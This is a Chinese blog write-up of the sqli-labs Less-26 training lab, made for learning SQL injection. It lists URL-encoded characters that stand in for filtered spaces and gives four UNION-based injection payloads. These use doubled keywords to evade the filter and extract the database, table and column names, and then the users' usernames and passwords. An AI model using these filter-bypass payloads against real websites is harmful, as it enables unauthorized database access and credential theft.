[网络安全]sqli-labs Less-26 解题详析

本文介绍了如何使用SQL注入技术,通过联合查询的方式过滤特定符号并获取数据库名、表名、列名以及用户数据。重点展示了在Sqli-Labs靶场中利用%0b、%0a等特殊字符进行的操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本关过滤 空格 or and /* # -- / 等符号

可用过滤符如下

%09TAB键(水平)
%0a新建一行
%0c新的一页
%0dreturn功能
%0bTAB键(垂直)
%a0空格

使用联合查询,具体原理及解题方法可见专栏:Sqli-Labs靶场专栏

查库名:

id=0'%0bunion%0bselect%0b1,database(),3||'1'='1

回显如下:

在这里插入图片描述

查表名:

id=0'%0bunion%0bselect%0b2,group_concat(table_name),4%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema=database()%26%26'1'='1

回显如下:

在这里插入图片描述

查列名:

id=0'%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_name='users'%0b%26%26%0btable_schema=database()%26%26'1'='1

回显如下:

在这里插入图片描述

查数据:

id=0'%0bunion%0bselect%0b2,(select%0bgroup_concat(concat_ws('-',id,username,passwoorrd))%0bfrom%0busers),4%0b||%0b'1'='1

回显如下:

在这里插入图片描述

评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值